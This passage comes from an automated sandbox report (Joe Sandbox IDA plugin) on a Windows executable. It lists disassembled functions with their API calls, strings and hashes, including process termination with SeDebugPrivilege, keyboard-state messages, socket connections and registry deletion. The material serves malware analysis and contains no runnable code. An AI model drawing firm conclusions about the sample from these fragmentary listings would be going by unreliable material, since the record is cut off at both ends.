                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E0C547
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0C569
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E0C581
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E0C59F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E0C5C0
                                          • DestroyCursor.USER32(00000000), ref: 00E0C5CF
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0C5EC
                                          • DestroyCursor.USER32(?), ref: 00E0C5FB
                                            • Part of subcall function 00E5A71E: DeleteObject.GDI32(00000000), ref: 00E5A757
                                          Similarity
                                          • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2975913752-0
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E0C
                                          • RtlAllocateHeap.NTDLL(00000000,?,00E28A84), ref: 00E28E13
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E28A84,00000B00,?,?), ref: 00E28E28
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E30
                                          • DuplicateHandle.KERNEL32(00000000,?,00E28A84,00000B00,?,?), ref: 00E28E33
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E28A84,00000B00,?,?), ref: 00E28E43
                                          • GetCurrentProcess.KERNEL32(00E28A84,00000000,?,00E28A84,00000B00,?,?), ref: 00E28E4B
                                          • DuplicateHandle.KERNEL32(00000000,?,00E28A84,00000B00,?,?), ref: 00E28E4E
                                          • CreateThread.KERNEL32(00000000,00000000,00E28E74,00000000,00000000,00000000), ref: 00E28E68
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                          • String ID:
                                          • API String ID: 1422014791-0
                                          APIs
                                            • Part of subcall function 00E27652: CLSIDFromProgID.COMBASE ref: 00E2766F
                                            • Part of subcall function 00E27652: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E2768A
                                            • Part of subcall function 00E27652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E2758C,80070057,?,?), ref: 00E27698
                                            • Part of subcall function 00E27652: CoTaskMemFree.COMBASE(00000000), ref: 00E276A8
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00E49B1B
                                          • _memset.LIBCMT ref: 00E49B28
                                          • _memset.LIBCMT ref: 00E49C6B
                                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00E49C97
                                          • CoTaskMemFree.COMBASE(?), ref: 00E49CA2
                                          Strings
                                          • NULL Pointer assignment, xrefs: 00E49CF0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          APIs
                                            • Part of subcall function 00E33E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E33EB6
                                            • Part of subcall function 00E33E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E33EC4
                                            • Part of subcall function 00E33E91: CloseHandle.KERNEL32(00000000), ref: 00E33F8E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ECB8
                                          • GetLastError.KERNEL32 ref: 00E4ECCB
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ECFA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E4ED77
                                          • GetLastError.KERNEL32(00000000), ref: 00E4ED82
                                          • CloseHandle.KERNEL32(00000000), ref: 00E4EDB7
                                          Strings
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E332C5
                                          Strings
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E3454E
                                          • LoadStringW.USER32(00000000), ref: 00E34555
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E3456B
                                          • LoadStringW.USER32(00000000), ref: 00E34572
                                          • _wprintf.LIBCMT ref: 00E34598
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E345B6
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E34593
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00DD2ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000,000000FF), ref: 00DD2B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00E0C46A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E0C417,00000004,00000000,00000000,00000000), ref: 00E0C4D6
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E3737F
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E373B6
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E373D2
                                          • _memmove.LIBCMT ref: 00E37420
                                          • _memmove.LIBCMT ref: 00E3743D
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E3744C
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E37461
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E37480
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00E5645A
                                          • GetDC.USER32(00000000), ref: 00E56462
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5646D
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E56479
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E564B5
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E564C6
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E59299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E56500
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E56520
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          APIs
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          • IsWindow.USER32(00F72230), ref: 00E5B6A5
                                          • IsWindowEnabled.USER32(00F72230), ref: 00E5B6B1
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E5B795
                                          • SendMessageW.USER32(00F72230,000000B0,?,?), ref: 00E5B7CC
                                          • IsDlgButtonChecked.USER32(?,?), ref: 00E5B809
                                          • GetWindowLongW.USER32(00F72230,000000EC), ref: 00E5B82B
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E5B843
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          APIs
                                          • _memset.LIBCMT ref: 00E4F75C
                                          • _memset.LIBCMT ref: 00E4F825
                                          • ShellExecuteExW.SHELL32(?), ref: 00E4F86A
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • GetProcessId.KERNEL32(00000000), ref: 00E4F8E1
                                          • CloseHandle.KERNEL32(00000000), ref: 00E4F910
                                          Strings
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          APIs
                                          • GetParent.USER32(?), ref: 00E3149C
                                          • GetKeyboardState.USER32(?), ref: 00E314B1
                                          • SetKeyboardState.USER32(?), ref: 00E31512
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E31540
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E3155F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E315A5
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E315C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 6f1212c28e270d650ebff932e253918c707f2deea706c1f544fcef2e399757f5
                                          • Instruction ID: d7d0be5d2bd65f4cde5463175377aeaee83f3cf076256aee40e08eef3910e03d
                                          • Opcode Fuzzy Hash: 6f1212c28e270d650ebff932e253918c707f2deea706c1f544fcef2e399757f5
                                          • Instruction Fuzzy Hash: F751F1A0A047D53EFB3643648C09BBA7EE95B46308F0C94CDE1D6668C2C2D8AC94D751
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00E312B5
                                          • GetKeyboardState.USER32(?), ref: 00E312CA
                                          • SetKeyboardState.USER32(?), ref: 00E3132B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E31357
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E31374
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E313B8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E313D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: ce45a85505d744fa15ed63f0bfb89540e63c242ca9fee1de4580641213964894
                                          • Instruction ID: 1f69cf1a0e9b05bf341c1c82e693e1cf7b87a591042cd0d39d069d996ca2ae8c
                                          • Opcode Fuzzy Hash: ce45a85505d744fa15ed63f0bfb89540e63c242ca9fee1de4580641213964894
                                          • Instruction Fuzzy Hash: 915104A05047D53DFB3683248C49BBABFE95F06308F0895CDE1D4668C2D795EC98E761
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: d5d163d07a1498ab23f8c492b92325774591c2db27016b51f7e49cd30bb51108
                                          • Instruction ID: 070e898d9331e6b3c0d63f36ed496109c590b9524fadd846057354a745b94e6f
                                          • Opcode Fuzzy Hash: d5d163d07a1498ab23f8c492b92325774591c2db27016b51f7e49cd30bb51108
                                          • Instruction Fuzzy Hash: 0241A366C2161876CB10FBB4888A9EFB7A8DF04310F51D966F618F3221E634E754C7B9
                                          APIs
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E338D3,?), ref: 00E348C7
                                            • Part of subcall function 00E348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E338D3,?), ref: 00E348E0
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E338F3
                                          • _wcscmp.LIBCMT ref: 00E3390F
                                          • MoveFileW.KERNEL32(?,?), ref: 00E33927
                                          • _wcscat.LIBCMT ref: 00E3396F
                                          • SHFileOperationW.SHELL32(?), ref: 00E339DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 040e189d32ec0174bc5fa93ce715be9a1c5ee29019b69694ab9291d42b6751bc
                                          • Instruction ID: 7113220504e38cc03cd184552bba4beccb2e569062ef8d71eac9775ee9cbe0d8
                                          • Opcode Fuzzy Hash: 040e189d32ec0174bc5fa93ce715be9a1c5ee29019b69694ab9291d42b6751bc
                                          • Instruction Fuzzy Hash: C64191B15083449EC751EF64C445AEFBBE8EF88340F10282EF489E3191EA74D688C762
                                          APIs
                                          • _memset.LIBCMT ref: 00E57519
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E575C0
                                          • IsMenu.USER32(?), ref: 00E575D8
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E57620
                                          • DrawMenuBar.USER32 ref: 00E57633
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: c46aff4eb06efbd74b4fd98719581473d5f089a58516bbf90355300b91007e07
                                          • Instruction ID: f2ece7ff0d21f79cd560d6b54ff40a3a8a9e4a4d943d9fc76c74d24151d39d8c
                                          • Opcode Fuzzy Hash: c46aff4eb06efbd74b4fd98719581473d5f089a58516bbf90355300b91007e07
                                          • Instruction Fuzzy Hash: 80416A74A04608EFDB20DF55E884E9ABBF8FB04355F04842AED55A7250D770AD68CFA0
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E5125C
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E51286
                                          • FreeLibrary.KERNEL32(00000000), ref: 00E5133D
                                            • Part of subcall function 00E5122D: RegCloseKey.ADVAPI32(?), ref: 00E512A3
                                            • Part of subcall function 00E5122D: FreeLibrary.KERNEL32(?), ref: 00E512F5
                                            • Part of subcall function 00E5122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E51318
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E512E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: a9807d7cb980724b2de73daf80bb78ac1aa87cdb46efb222a413b3f1094dfaa5
                                          • Instruction ID: 19e61795b49266db996e484f366cfd7e67e9b217c4cc626aab7e32639c676b61
                                          • Opcode Fuzzy Hash: a9807d7cb980724b2de73daf80bb78ac1aa87cdb46efb222a413b3f1094dfaa5
                                          • Instruction Fuzzy Hash: E0315E75901209BFDB14DB90DC89EFFB7BCEF08305F0009A9E911F2151DB749E499AA0
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E5655B
                                          • GetWindowLongW.USER32(00F72230,000000F0), ref: 00E5658E
                                          • GetWindowLongW.USER32(00F72230,000000F0), ref: 00E565C3
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E565F5
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E5661F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E56630
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E5664A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: a936e2ebd998aef4841f27c8704cbd64298d4412fe95e678f8a8db71c7ab8d2b
                                          • Instruction ID: 49392e20d6db07b53b9e37a7809f8b5b20b394318177de4a20f5e4f479e37b6d
                                          • Opcode Fuzzy Hash: a936e2ebd998aef4841f27c8704cbd64298d4412fe95e678f8a8db71c7ab8d2b
                                          • Instruction Fuzzy Hash: 4B313730644210AFDB24CF19DC84F5537E1FB4A35AF9819AAF901AB2B5DB71EC48DB81
                                          APIs
                                            • Part of subcall function 00E480A0: inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00E464D9
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E464E8
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00E46521
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00E4652A
                                          • WSAGetLastError.WS2_32 ref: 00E46534
                                          • closesocket.WS2_32(00000000), ref: 00E4655D
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00E46576
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 8e9a67d48300b333237b01d70c7eb0fd6c841543d9ba4850bb4466ddf47c3a4d
                                          • Instruction ID: bdbbf5499811302e12b26b5d09079313d61d7763243c16efacde08d238ead282
                                          • Opcode Fuzzy Hash: 8e9a67d48300b333237b01d70c7eb0fd6c841543d9ba4850bb4466ddf47c3a4d
                                          • Instruction Fuzzy Hash: F731B371600218AFDF14AF24EC85BBE7BACEB45715F00542AF909B7291DB74AD08CB62
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E2E0FA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E2E120
                                          • SysAllocString.OLEAUT32(00000000), ref: 00E2E123
                                          • SysAllocString.OLEAUT32 ref: 00E2E144
                                          • SysFreeString.OLEAUT32 ref: 00E2E14D
                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00E2E167
                                          • SysAllocString.OLEAUT32(?), ref: 00E2E175
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 77f28f5b3ba0462c5f08ecc0c10b4a880ce23ae4038b6ba99c1ec7a50ec2e778
                                          • Instruction ID: fa5a0870972050672ce4736f78c247aaaac6c46c16b5ac6b1244909ebacddbb2
                                          • Opcode Fuzzy Hash: 77f28f5b3ba0462c5f08ecc0c10b4a880ce23ae4038b6ba99c1ec7a50ec2e778
                                          • Instruction Fuzzy Hash: 6F217435605228AFDB149FA9DC88CAB77ECEB09760B108135F915DB2A1DB70DC458B64
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E578A1
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E578AE
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E578B9
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E578C8
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E578D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 2ad58253b13f65b7f3b4e916611634c0e783091d47db5945540b9077eaabaa76
                                          • Instruction ID: b618bf19f5f78370d19cd2ae298f788a7e558e43a76a0234d236e17f54db5ff4
                                          • Opcode Fuzzy Hash: 2ad58253b13f65b7f3b4e916611634c0e783091d47db5945540b9077eaabaa76
                                          • Instruction Fuzzy Hash: DC11B2B2110229BFEF159F60CC85EE77F6DEF087A8F015115FA48A2090C772AC25DBA0
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00DF41E3
                                          • GetProcAddress.KERNEL32(00000000), ref: 00DF41EA
                                          • RtlEncodePointer.NTDLL(00000000), ref: 00DF41F6
                                          • RtlDecodePointer.NTDLL(00000001), ref: 00DF4213
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 3489934621-340411864
                                          • Opcode ID: beb5c13b5d0cfd261ade817d403815241d9ef79209f0841c6716f9150918d482
                                          • Instruction ID: 8f3a31bae0d95fecec5bb63b8f3f27e6cc440a17118c95d25e4de81d62699c61
                                          • Opcode Fuzzy Hash: beb5c13b5d0cfd261ade817d403815241d9ef79209f0841c6716f9150918d482
                                          • Instruction Fuzzy Hash: 1FE0EDF45917009EEB106B73EC09F153694AB10743F108826F551F50E0DBB5409A8B10
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00DF41B8), ref: 00DF42B8
                                          • GetProcAddress.KERNEL32(00000000), ref: 00DF42BF
                                          • RtlEncodePointer.NTDLL(00000000), ref: 00DF42CA
                                          • RtlDecodePointer.NTDLL(00DF41B8), ref: 00DF42E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: 54c1f3fdb85014d971e25cd5eabff34ef79075a1a5c6c661be33d42597fb3796
                                          • Instruction ID: 6d118f0230f55c917fad405067ec087da030a497988e6c5cd5577f8b456404cf
                                          • Opcode Fuzzy Hash: 54c1f3fdb85014d971e25cd5eabff34ef79075a1a5c6c661be33d42597fb3796
                                          • Instruction Fuzzy Hash: 8CE0BFBC5827009FEB149B63FD0DF163AA4B714787F14542AF115F10F0CB744549CA18
                                          APIs
                                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00E46F14
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46F48
                                          • htons.WS2_32(?), ref: 00E46FFE
                                          • inet_ntoa.WS2_32(?), ref: 00E46FBB
                                            • Part of subcall function 00E2AE14: _strlen.LIBCMT ref: 00E2AE1E
                                            • Part of subcall function 00E2AE14: _memmove.LIBCMT ref: 00E2AE40
                                          • _strlen.LIBCMT ref: 00E47058
                                          • _memmove.LIBCMT ref: 00E470C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: c06c9bc2204157ebb55f23f8200f0d2396d691c43d6a863651de7359a1001c3c
                                          • Instruction ID: 1e89b2f64281f5afc0f8c2c31aa88e758feb13cc7dce9139dac1fdcfe0f4aec8
                                          • Opcode Fuzzy Hash: c06c9bc2204157ebb55f23f8200f0d2396d691c43d6a863651de7359a1001c3c
                                          • Instruction Fuzzy Hash: 9781E071108300AFC710EF24EC91F6BB7E9EF84718F14591AF555AB292DB71AD04CBA2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
